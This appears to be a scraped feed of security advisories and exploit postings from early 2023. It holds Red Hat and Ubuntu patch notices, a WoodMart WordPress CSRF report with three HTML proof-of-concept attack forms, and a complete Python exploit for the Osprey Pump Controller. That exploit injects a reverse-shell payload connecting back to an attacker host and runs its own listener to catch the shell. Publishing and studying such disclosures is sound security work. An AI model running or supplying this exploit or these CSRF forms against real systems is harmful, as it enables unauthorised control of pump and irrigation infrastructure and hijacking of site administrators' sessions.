Red Hat Security Advisory 2023-1015-01 - OpenStack Compute is open source software designed to provision and manage large networks of virtual machines,creating a redundant and scalable cloud computing platform. It gives you the software, control panels, and APIs required to orchestrate a cloud, including running instances, managing networks, and controlling access through users and projects.OpenStack Compute strives to be both hardware and hypervisor agnostic, currently supporting a variety of standard hardware configurations and seven major hypervisors.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenStack Platform 17.0 (openstack-nova) security update  
Advisory ID:       RHSA-2023:1015-01  
Product:           Red Hat OpenStack Platform  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1015  
Issue date:        2023-02-28  
CVE Names:         CVE-2022-47951  
====================================================================  
1. Summary:

An update for openstack-nova is now available for Red Hat OpenStack  
Platform 17.0 (Wallaby).

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenStack Platform 17.0 - noarch

3. Description:

OpenStack Compute (codename Nova) is open source software designed  
to provision and manage large networks of virtual machines,creating a  
redundant and scalable cloud computing platform. It gives you the software,  
control panels, and APIs required to orchestrate a cloud, including running  
instances, managing networks, and controlling access through users and  
projects.OpenStack Compute strives to be both hardware and hypervisor  
agnostic, currently supporting a variety of standard hardware  
configurations and seven major hypervisors.

Security Fix(es):

* Arbitrary file access through custom VMDK flat descriptor  
(CVE-2022-47951)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2161812 - CVE-2022-47951 openstack: Arbitrary file access through custom VMDK flat descriptor

6. Package List:

Red Hat OpenStack Platform 17.0:

Source:  
openstack-nova-23.2.2-0.20221209190753.7074ac0.el9ost.src.rpm

noarch:  
openstack-nova-23.2.2-0.20221209190753.7074ac0.el9ost.noarch.rpm  
openstack-nova-api-23.2.2-0.20221209190753.7074ac0.el9ost.noarch.rpm  
openstack-nova-common-23.2.2-0.20221209190753.7074ac0.el9ost.noarch.rpm  
openstack-nova-compute-23.2.2-0.20221209190753.7074ac0.el9ost.noarch.rpm  
openstack-nova-conductor-23.2.2-0.20221209190753.7074ac0.el9ost.noarch.rpm  
openstack-nova-migration-23.2.2-0.20221209190753.7074ac0.el9ost.noarch.rpm  
openstack-nova-novncproxy-23.2.2-0.20221209190753.7074ac0.el9ost.noarch.rpm  
openstack-nova-scheduler-23.2.2-0.20221209190753.7074ac0.el9ost.noarch.rpm  
openstack-nova-serialproxy-23.2.2-0.20221209190753.7074ac0.el9ost.noarch.rpm  
openstack-nova-spicehtml5proxy-23.2.2-0.20221209190753.7074ac0.el9ost.noarch.rpm  
python3-nova-23.2.2-0.20221209190753.7074ac0.el9ost.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-47951  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY/5H7dzjgjWX9erEAQja3g/+I9G4n/GLJQ/eZ5SllbhDb20v4YNfuBTL  
7VPq9GRNbc9FpoUKQCIOhEe1CXz+Eg7CIaurIu83EToox2YlFKHaK84MU38odXNT  
zmDbDh7v/0ytzYrTENDtKHmhmaQN/lEEDDITBkQ6v6WlH2agx1jHnV42YeJd/wEZ  
XB2dTMtcTXbma/pJU06VLEcq4OPixVvNRWCo/4ArjFHRVQe6dIot4pH8fl/BA9kk  
gHUoHtSIpx8VRA86LQQcOfw6eRiadPvZWlTjSYWxu75cUnAE/XyUBvKnJPK7hyrP  
12S6NIFJLV1zKW+ul3Ktu7sTR03C0+VPkpOJQcX4UDQm2aAPsGarYic06MsTfIJz  
jhLP64xZwDVKI+EYoz6sjhgcZolPoTu0Qd1f7nHqVwpsE9fnTAHTOVeWJD2bTBIm  
BzjHKQVTs2HLk86ajjUpVAbgUCf8hGp1PP6BQt21tN0TuFbSYkGgm2RHA74az4X0  
GhWkrS2q14abR9RWWXCWOlyj6cw+/9Bb2mb98MAcKy9NVjipuSwFvT2BOOHJ6/9+  
yk4V0zaCfPGD/es2hZIMtEJjmjdMn7OjPHt+i8R33p1K5bHwbviun2eZnPvD23hA  
YKkTph39d6jrJoXIi1MWSL+wpIs8yB/O7UnyxewuTCfAHmtKtGMJZFyJcZYli8Sa  
G6bYSLQgwVc=SPUX  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1015-01

Ubuntu Security Notice 5903-1 - It was discovered that lighttpd incorrectly handled certain inputs, which could result in a stack buffer overflow. A remote attacker could possibly use this issue to cause a denial of service.

    =========================================================================Ubuntu Security Notice USN-5903-1February 28, 2023lighttpd vulnerabilities=========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.10- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in lighttpd.Software Description:- lighttpd: fast webserver with minimal memory footprintDetails:It was discovered that lighttpd incorrectly handled certain inputs, which couldresult in a stack buffer overflow. A remote attacker could possibly use thisissue to cause a denial of service (DoS). (CVE-2022-22707, CVE-2022-41556)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.10:  lighttpd                        1.4.65-2ubuntu1.1Ubuntu 22.04 LTS:  lighttpd                        1.4.63-1ubuntu3.1Ubuntu 20.04 LTS:  lighttpd                        1.4.55-1ubuntu1.20.04.2After a standard system update you need to restart lighttpd to makeall the necessary changes.References:  https://ubuntu.com/security/notices/USN-5903-1  CVE-2022-22707, CVE-2022-41556Package Information:  https://launchpad.net/ubuntu/+source/lighttpd/1.4.65-2ubuntu1.1  https://launchpad.net/ubuntu/+source/lighttpd/1.4.63-1ubuntu3.1  https://launchpad.net/ubuntu/+source/lighttpd/1.4.55-1ubuntu1.20.04.2

Ubuntu Security Notice USN-5903-1

Ubuntu Security Notice 5902-1 - It was discovered that PHP incorrectly handled certain invalid Blowfish password hashes. An invalid password hash could possibly allow applications to accept any password as valid, contrary to expectations. It was discovered that PHP incorrectly handled resolving long paths. A remote attacker could possibly use this issue to obtain or modify sensitive information. It was discovered that PHP incorrectly handled a large number of parts in HTTP form uploads. A remote attacker could possibly use this issue to cause PHP to consume resources, leading to a denial of service.

==========================================================================  
Ubuntu Security Notice USN-5902-1  
February 28, 2023

php7.2, php7.4, php8.1 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in PHP.

Software Description:  
- php8.1: HTML-embedded scripting language interpreter  
- php7.4: HTML-embedded scripting language interpreter  
- php7.2: HTML-embedded scripting language interpreter

Details:

It was discovered that PHP incorrectly handled certain invalid Blowfish  
password hashes. An invalid password hash could possibly allow applications  
to accept any password as valid, contrary to expectations. (CVE-2023-0567)

It was discovered that PHP incorrectly handled resolving long paths. A  
remote attacker could possibly use this issue to obtain or modify sensitive  
information. (CVE-2023-0568)

It was discovered that PHP incorrectly handled a large number of parts in  
HTTP form uploads. A remote attacker could possibly use this issue to cause  
PHP to consume resources, leading to a denial of service. (CVE-2023-0662)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
   libapache2-mod-php8.1           8.1.7-1ubuntu3.3  
   php8.1                          8.1.7-1ubuntu3.3  
   php8.1-cgi                      8.1.7-1ubuntu3.3  
   php8.1-cli                      8.1.7-1ubuntu3.3  
   php8.1-fpm                      8.1.7-1ubuntu3.3

Ubuntu 22.04 LTS:  
   libapache2-mod-php8.1           8.1.2-1ubuntu2.11  
   php8.1                          8.1.2-1ubuntu2.11  
   php8.1-cgi                      8.1.2-1ubuntu2.11  
   php8.1-cli                      8.1.2-1ubuntu2.11  
   php8.1-fpm                      8.1.2-1ubuntu2.11

Ubuntu 20.04 LTS:  
   libapache2-mod-php7.4           7.4.3-4ubuntu2.18  
   php7.4                          7.4.3-4ubuntu2.18  
   php7.4-cgi                      7.4.3-4ubuntu2.18  
   php7.4-cli                      7.4.3-4ubuntu2.18  
   php7.4-fpm                      7.4.3-4ubuntu2.18

Ubuntu 18.04 LTS:  
   libapache2-mod-php7.2           7.2.24-0ubuntu0.18.04.17  
   php7.2                          7.2.24-0ubuntu0.18.04.17  
   php7.2-cgi                      7.2.24-0ubuntu0.18.04.17  
   php7.2-cli                      7.2.24-0ubuntu0.18.04.17  
   php7.2-fpm                      7.2.24-0ubuntu0.18.04.17

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5902-1  
   CVE-2023-0567, CVE-2023-0568, CVE-2023-0662

Package Information:  
   https://launchpad.net/ubuntu/+source/php8.1/8.1.7-1ubuntu3.3  
   https://launchpad.net/ubuntu/+source/php8.1/8.1.2-1ubuntu2.11  
   https://launchpad.net/ubuntu/+source/php7.4/7.4.3-4ubuntu2.18  
   https://launchpad.net/ubuntu/+source/php7.2/7.2.24-0ubuntu0.18.04.17

Ubuntu Security Notice USN-5902-1

Osprey Pump Controller version 1.0.1 unauthenticated remote code execution exploit.

    #!/usr/bin/env python### Osprey Pump Controller 1.0.1 Unauthenticated Remote Code Execution Exploit### Vendor: ProPump and Controls, Inc.# Product web page: https://www.propumpservice.com | https://www.pumpstationparts.com# Affected version: Software Build ID 20211018, Production 10/18/2021#                   Mirage App: MirageAppManager, Release [1.0.1]#                   Mirage Model 1, RetroBoard II### Summary: Providing pumping systems and automated controls for# golf courses and turf irrigation, municipal water and sewer,# biogas, agricultural, and industrial markets. Osprey: door-mounted,# irrigation and landscape pump controller.## Technology hasn't changed dramatically on pump and electric motors# in the last 30 years. Pump station controls are a different story.# More than ever before, customers expect the smooth and efficient# operation of VFD control. Communications—monitoring, remote control,# and interfacing with irrigation computer programs—have become common# requirements. Fast and reliable accessibility through cell phones# has been a game changer.## ProPump & Controls can handle any of your retrofit needs, from upgrading# an older relay logic system to a powerful modern PLC controller, to# converting your fixed speed or first generation VFD control system to# the latest control platform with communications capabilities.## We use a variety of solutions, from MCI-Flowtronex and Watertronics# package panels to sophisticated SCADA systems capable of controlling# and monitoring networks of hundreds of pump stations, valves, tanks,# deep wells, or remote flow meters.## User friendly system navigation allows quick and easy access to all# critical pump station information with no password protection unless# requested by the customer. Easy to understand control terminology allows# any qualified pump technician the ability to make basic changes without# support. Similar control and navigation platform compared to one of the# most recognized golf pump station control systems for the last twenty# years make it familiar to established golf service groups nationwide.# Reliable push button navigation and LCD information screen allows the# use of all existing control panel door switches to eliminate the common# problems associated with touchscreens.## Global system configuration possibilities allow it to be adapted to# virtually any PLC or relay logic controlled pump stations being used in# the industrial, municipal, agricultural and golf markets that operate# variable or fixed speed. On board Wi-Fi and available cellular modem# option allows complete remote access.## Desc: The controller suffers from an unauthenticated command injection# vulnerability that allows system access with www-data permissions.## ----------------------------------------------------------------------# Triggering command injection...# Trying vector: /DataLogView.php# Operator...?# You got a call from 192.168.3.180:54508# www-data@OspreyController:/var/www/html$ id;pwd# uid=33(www-data) gid=33(www-data) groups=33(www-data)# /var/www/html# www-data@OspreyController:/var/www/html$ exit# Zya!# ----------------------------------------------------------------------## Tested on: Apache/2.4.25 (Raspbian)#            Raspbian GNU/Linux 9 (stretch)#            GNU/Linux 4.14.79-v7+ (armv7l)#            Python 2.7.13 [GCC 6.3.0 20170516]#            GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git#            PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33)### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic# Macedonian Information Security Research and Development Laboratory# Zero Science Lab - https://www.zeroscience.mk - @zeroscience### Advisory ID: ZSL-2023-5754# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5754.php### 05.01.2023##                   o    o#                  O    O#                   o    o#                    o    o#_____________________\  /#                      ||#                      ||#                      ||from  time  import   sleepimport pygame.midi   #---#import subprocess    #---#import threading    #-----#import telnetlib    #-----#import requests    #-------#import socket    #-----------#import pygame    #-----------#import random    #-----------#import sys     #---------------#import re     #-----------------####### #      #-----------------#class Pump__it__up:    def __init__(self):        self.sound=False        self.param="eventFileSelected"        self.vector=["/DataLogView.php?"+self.param,                     "/AlarmsView.php?"+self.param,                     "/EventsView.php?"+self.param,                     "/index.php"] # POST        self.payload=None        self.sagent="Tic"        self.rhost=None        self.lhost=None        self.lport=None    def propo(self):        if len(sys.argv)!=4:            self.kako()        else:            self.presh()            self.rhost=sys.argv[1]            self.lhost=sys.argv[2]            self.lport=int(sys.argv[3])            if not "http" in self.rhost:                self.rhost="http://{}".format(self.rhost)    def kako(self):        self.pumpaj()        print("Ovakoj: python {} [RHOST:RPORT] [LHOST] [LPORT]".format(sys.argv[0]))        exit(0)    def pumpaj(self):        titl="""                 .-.                 |  \\                 | / \\             ,___| |  \\            / ___( )   L           '-`   | |   |                 | |   F                 | |  /                 | |                 | |             ____|_|____            [___________]      ,,,,,/,,,,,,,,,,,,,\\,,,,,o-------------------------------------o Osprey Pump Controller RCE Rev Shel_                v1.0j          Ref: ZSL-2023-5754            by lqwrm, 2023o-------------------------------------o        """        print(titl)    def injekcija(self):        self.headers={"Accept":"*/*",                      "Connection":"close",                      "User-Agent":self.sagent,                      "Cache-Control":"max-age=0",                       "Accept-Encoding":"gzip,deflate",                      "Accept-Language":"en-US,en;q=0.9"}            self.payload =";"######################################################"        self.payload+="/usr/bin/python%20-c%20%27import%20socket,subprocess,os;"        self.payload+="s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.con"        self.payload+="nect((%22"+self.lhost+"%22,"+str(self.lport)+"));os.dup2"        self.payload+="(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),"        self.payload+="2);import%20pty;%20pty.spawn(%22/bin/bash%22)%27"#######"                print("Triggering command injection...")                for url in self.vector:            if url=="/index.php":                print("Trying vector:",url)                import urllib.parse                self.headers["Content-Type"]="application/x-www-form-urlencoded"                self.postdata={"userName":urllib.parse.unquote(self.payload),                               "pseudonym":"251"}                r=requests.post(self.rhost+url,headers=self.headers,data=self.postdata)                if r.status_code == 200:                    break            else:                print("Trying vector:",url[:-18])                r=requests.get(self.rhost+url+"="+self.payload,headers=self.headers)                print("Code:",r.status_code)                if r.status_code == 200:                    print('Access Granted!')                    break    def netcat(self):        import nclib        server = nclib.TCPServer(("0.0.0.0",int(self.lport)))        print("Operator...?")        server.sock.settimeout(7)        for client in server:            print("You got a call from %s:%d" % client.peer)            command=""            while command!="exit":                if len(command)>0:                    if command in client.readln().decode("utf-8").strip(" "):                        pass                data = client.read_until('$')                print(data.decode("utf-8"), end="")                command = input(" ")                client.writeln(command)            print("Zya!")            exit(1)    def rasplet(self):        if self.sound:            konac1=threading.Thread(name="Pump_Up_The_Jam_1",target=self.entertain)            konac1.start()        konac2=threading.Thread(name="Pump_Up_The_Jam_2",target=self.netcat)        konac2.start()        self.injekcija()    def presh(self):        titl2="""  _______________________________________ /                                       \\|  {###################################}  ||  {##     Osprey Pump Controller    ##}  ||  {##            RCE 0day           ##}  ||  {##                               ##}  ||  {##         ZSL-2023-5754         ##}  ||  {###################################}  ||                                         ||               80  90  100               ||            70     ^      120            ||        60 *      /|\       * 140        ||    55             |              160    ||                   |                     ||                   |                     ||   (O)            (+)              (O)   | \_______________________________________/        """        print(titl2)    def entertain(self):                pygame.midi.init()        midi_output=pygame.midi.Output(0)            notes=[            (74,251),(86,251),(76,251),(88,251),(84,251),(72,251),(69,251),(81,251),            (83,251),(71,251),(67,251),(79,251),(74,251),(62,251),(64,251),(76,251),            (72,251),(60,251),(69,251),(57,251),(59,251),(71,251),(55,251),(67,251),            (62,251),(50,251),(64,251),(52,251),(48,251),(60,251),(57,251),(45,251),            (47,251),(59,251),(45,251),(57,251),(56,251),(44,251),(43,251),(55,251),            (67,251),(43,251),(55,251),(79,251),(71,251),(74,251),(55,251),(59,251),            (62,251),(63,251),(48,251),(64,251),(72,251),(52,251),(55,251),(60,251),            (64,251),(43,251),(55,251),(72,251),(60,251),(64,251),(55,251),(58,251),            (72,251),(41,251),(53,251),(60,251),(57,251),(52,251),(40,251),(72,251),            (76,251),(84,251),(55,251),(60,251),(77,251),(86,251),(74,251),(75,251),            (78,251),(87,251),(79,251),(43,251),(76,251),(88,251),(72,251),(84,251),            (76,251),(60,251),(55,251),(86,251),(74,251),(77,251),(52,251),(88,251),            (79,251),(76,251),(43,251),(83,251),(74,251),(71,251),(86,251),(74,251),            (77,251),(59,251),(53,251),(55,251),(76,251),(84,251),(48,251),(72,251),            (52,251),(55,251),(60,251),(52,251),(55,251),(60,251),(55,251),(59,251),            (62,251),(63,251),(64,251),(48,251),(72,251),(60,251),(52,251),(55,251),            (64,251),(43,251),(55,251),(72,251),(64,251),(55,251),(58,251),(60,251),            (72,251),(41,251),(53,251),(60,251),(57,251),(40,251),(52,251),(72,251),            (51,251),(81,251),(39,251),(69,251),(67,251),(79,251),(72,251),(38,251),            (50,251),(78,251),(66,251),(72,251),(69,251),(81,251),(50,251),(72,251),            (54,251),(57,251),(84,251),(60,251),(76,251),(88,251),(50,251),(74,251),            (86,251),(84,251),(54,251),(57,251),(60,251),(72,251),(69,251),(81,251)]        channel=0        velocity=124        for note, duration in notes:            midi_output.note_on(note, velocity, channel)            duration=59            pygame.time.wait(random.randint(100,301))            pygame.time.wait(duration)            midi_output.note_off(note, velocity, channel)            del midi_output        pygame.midi.quit()    def main(self):        self.propo()        self.rasplet()        exit(1)if __name__=='__main__':    Pump__it__up().main()

Osprey Pump Controller 1.0.1 Unauthenticated Remote Code Execution

Ubuntu Security Notice 5821-3 - USN-5821-1 fixed a vulnerability in wheel and pip. Unfortunately, it was missing a commit to fix it properly in pip. Sebastian Chnelik discovered that wheel incorrectly handled certain file names when validated against a regex expression. An attacker could possibly use this issue to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-5821-3  
February 28, 2023

python-pip regression  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 ESM  
- Ubuntu 14.04 ESM

Summary:

USN-5821-1 caused a regression in pip.

Software Description:  
- python-pip: Python package installer

Details:

USN-5821-1 fixed a vulnerability in wheel and pip. Unfortunately,  
it was missing a commit to fix it properly in pip.

We apologize for the inconvenience.

Original advisory details:

  Sebastian Chnelik discovered that wheel incorrectly handled  
  certain file names when validated against a regex expression.  
  An attacker could possibly use this issue to cause a  
  denial of service.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
   python3-pip                     22.2+dfsg-1ubuntu0.2  
   python3-pip-whl                 22.2+dfsg-1ubuntu0.2

Ubuntu 22.04 LTS:  
   python3-pip                     22.0.2+dfsg-1ubuntu0.2  
   python3-pip-whl                 22.0.2+dfsg-1ubuntu0.2

Ubuntu 20.04 LTS:  
   python-pip-whl                  20.0.2-5ubuntu1.8  
   python3-pip                     20.0.2-5ubuntu1.8

Ubuntu 18.04 LTS:  
   python-pip                      9.0.1-2.3~ubuntu1.18.04.7  
   python-pip-whl                  9.0.1-2.3~ubuntu1.18.04.7  
   python3-pip                     9.0.1-2.3~ubuntu1.18.04.7

Ubuntu 16.04 ESM:  
   python-pip                      8.1.1-2ubuntu0.6+esm4  
   python-pip-whl                  8.1.1-2ubuntu0.6+esm4  
   python3-pip                     8.1.1-2ubuntu0.6+esm4

Ubuntu 14.04 ESM:  
   python-pip                      1.5.4-1ubuntu4+esm3  
   python-pip-whl                  1.5.4-1ubuntu4+esm3  
   python3-pip                     1.5.4-1ubuntu4+esm3

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5821-3  
   https://ubuntu.com/security/notices/USN-5821-1  
   CVE-2022-40898

Package Information:  
https://launchpad.net/ubuntu/+source/python-pip/22.2+dfsg-1ubuntu0.2  
https://launchpad.net/ubuntu/+source/python-pip/22.0.2+dfsg-1ubuntu0.2  
https://launchpad.net/ubuntu/+source/python-pip/20.0.2-5ubuntu1.8  
https://launchpad.net/ubuntu/+source/python-pip/9.0.1-2.3~ubuntu1.18.04.7

Ubuntu Security Notice USN-5821-3

WordPress WoodMart Theme versions 7.1.1 and below suffer from a cross site request forgery vulnerability due to missing nonce validation on the process_form function.

    ==== [ Z://USB-00_RESEARCH/WORDPRESS/ ] ============================================= [ 2023 ] ==Report Title:        WordPress WoodMart Theme <= 7.1.1 - Theme License Options Change via CSRFGoogle Dork:         inurl:/wp-content/themes/woodmart/Research Date:       2023-02-10Researcher:          FearZzZz [ https://fearzzzz.ru ]Component Vendor:    XTemos [ https://themeforest.net/user/xtemos ]Vulnerable Version:  <= 7.1.1Component Link:      https://themeforest.net/item/woodmart-woocommerce-wordpress-theme/20264492CVSS Base Score:     5.4 (Medium)CVSS Vector String:  CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:LOWASP Top 10:        A01: 2021 – Broken Access ControlCWE:                 CWE-352CVE:                 TBA=================================================================================================#### [ Description: ]The WoodMart theme for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) in versions up to, and including, v7.1.1, because of missing nonce validation on the 'process_form' function. This vulnerability could allow an attacker to trick users into performing an action they didn't intend to perform under their current authentication.#### [ Vulnerable Code: ]File #0: ~/woodmart/inc/classes/License.php, lines: 134-143.```if ( isset( $_POST['purchase-code-deactivate'] ) ) {  $this->deactivate();  $this->_notices->add_success( 'Theme license is successfully deactivated.' );  return;}if ( isset( $_POST['woodmart-purchase-code'] ) && ( ! isset( $_POST['agree_stored'] ) || empty( $_POST['agree_stored'] ) ) ) {  $this->_notices->add_error( 'You must agree to store your purchase code and user data by xtemos.com' );  return;}```#### [ Impact: ]Impact of a CSRF vulnerability is related to the privileges of the target user. Depending on the nature of the action, an attacker might be able to change some data or gain full control over the user's account. If the compromised user has a privileged role (administrator, i.e.) within the application, then the attacker can gain full control over the application.#### [ Proof-of-Concept: ]```<html>  <body>  <script>history.pushState('', '', '/')</script>    <form action="https://fearzzzz.ru/wp-admin/admin.php?page=xts_dashboard&tab=wizard&step=activation" method="POST">      <input type="hidden" name="purchase-code" value="Z" />      <input type="hidden" name="agree_stored" value="on" />      <input type="hidden" name="woodmart-purchase-code" value="Activate theme" />      <input type="submit" value="Submit request" />    </form>  </body></html>``````<html>  <body>  <script>history.pushState('', '', '/')</script>    <form action="https://fearzzzz.ru/wp-admin/admin.php?page=xts_license" method="POST">      <input type="hidden" name="purchase-code" value="Z" />      <input type="hidden" name="agree_stored" value="on" />      <input type="hidden" name="woodmart-purchase-code" value="Activate theme" />      <input type="submit" value="Submit request" />    </form>  </body></html>``````<html>  <body>  <script>history.pushState('', '', '/')</script>    <form action="https://fearzzzz.ru/wp-admin/admin.php?page=xts_license" method="POST">      <input type="hidden" name="purchase-code-deactivate" value="1" />      <input type="submit" value="Submit request" />    </form>  </body></html>```#### [ Timeline: ]2023.02.10 - Vulnerability has been discovered.2023.02.13 - WoodMart Theme v7.1.0 released.2023.02.14 - WoodMart Theme v7.1.1 released.2023.02.14 - Vendor notified, received a quick response.2023.02.14 - All the details was addressed to Envato and Patchstack. CVE ID requested.2023.02.15 - WoodMart Theme v7.1.2 released, the vulnerability has been fixed.#### [ Contacts: ]Website:   fearzzzz.ruEmail:     fearzzzz@tutanota.comTwitter:   https://twitter.com/fear_zzzzMedium:    https://fearzzzz.medium.comGitHub:    https://github.com/fearzzzzYouTube:   https://youtube.com/@fearzzzz#### [ Notes: ]Special thanks to Mikhail Kobzarev (https://t.me/mihdan | https://wp-digest.com) for providing the original theme files.Additional greetings to Kailoon (ThemeForest Senior Reviewer, https://kailoon.com) and XTemos Studio (https://themeforest.net/user/xtemos) for the prompt response.#### [ Disclaimer: ]The information provided in this report is provided "as is" without warranty of any kind. FearZzZz disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall FearZzZz be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if FearZzZz have been advised of the possibility of such damages.========================================================================== [ www.fearzzzz.ru ] ==

WordPress WoodMart Theme 7.1.1 Cross Site Request Forgery

Red Hat Security Advisory 2023-0945-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2023:0945-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0945  
Issue date:        2023-02-28  
CVE Names:         CVE-2022-4378   
=====================================================================

1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux  
7.7 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Server E4S (v. 7.7) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: stack overflow in do_proc_dointvec and proc_skip_spaces  
(CVE-2022-4378)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2152548 - CVE-2022-4378 kernel: stack overflow in do_proc_dointvec and proc_skip_spaces

6. Package List:

Red Hat Enterprise Linux Server E4S (v. 7.7):

Source:  
kpatch-patch-3_10_0-1062_68_1-1-1.el7.src.rpm  
kpatch-patch-3_10_0-1062_70_1-1-1.el7.src.rpm

ppc64le:  
kpatch-patch-3_10_0-1062_68_1-1-1.el7.ppc64le.rpm  
kpatch-patch-3_10_0-1062_68_1-debuginfo-1-1.el7.ppc64le.rpm  
kpatch-patch-3_10_0-1062_70_1-1-1.el7.ppc64le.rpm  
kpatch-patch-3_10_0-1062_70_1-debuginfo-1-1.el7.ppc64le.rpm

x86_64:  
kpatch-patch-3_10_0-1062_68_1-1-1.el7.x86_64.rpm  
kpatch-patch-3_10_0-1062_68_1-debuginfo-1-1.el7.x86_64.rpm  
kpatch-patch-3_10_0-1062_70_1-1-1.el7.x86_64.rpm  
kpatch-patch-3_10_0-1062_70_1-debuginfo-1-1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-4378  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY/3zwNzjgjWX9erEAQgckw/7B9elFpmuesMfyPfX2TOojH8y3cplE1Bl  
MkYwIDtD1hsuQPs+CyAczXmybgFA2E+Lruldm9MI3qcyKkQDUjsKUTyO+OKqPQz/  
TgohO3q04tg/uEMGod96pcj5gn+/wddXzMH69tWLkAGlj+IS7vaj1zcCzpqoRkBL  
Ld4QCi4lAZcByXn8KZpcqT8SUJhhCHcSwJjgjBiiWlMuh1BQpTcnaOU+YSRUK7ox  
e/eRn3KzkXf0mEp648t6SLs74IFrmlgtswUGZYxRGVBZnm9U1hl8uIFOMZNeekKf  
TL2K+r2KwcFEOAr1q2oVaaqgNyr1r/P094rZqUtdah80gu8xnaH2nXV7pjOH2xy8  
oorD/XpbZyg6/3XZwKRGMVJkcyqBaUiNy9I85qi0kffk52rQWjP88TKPM9Nq5S2T  
ZkmLOgTNelWNsv10KwR87K+rg9+F+GlFTEtGwUOcmlLEVwd+cAJb6HAXJrBULXCA  
5WNQacQtJ4JQ6iSaZfNRDfsHk44cXzeSMpyKDqZUlaVsZaq4BtgHMRfnSNLnw1k1  
N2rsmA2Dp6+CHY4nStTOsFIqCqh7HHqVLxUxIoGegwTdzbD59EdCICiIOj9bUJDL  
62urASH/uAxCFMFPaAx2JefEZkwCzPYJVTxoejFnESSkkxJ5rIrxiz05HgNVkA/g  
SfHzKU8H41E=  
=xuoe  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0945-01

Osprey Pump Controller version 1.0.1 suffers from a cross site request forgery vulnerability.

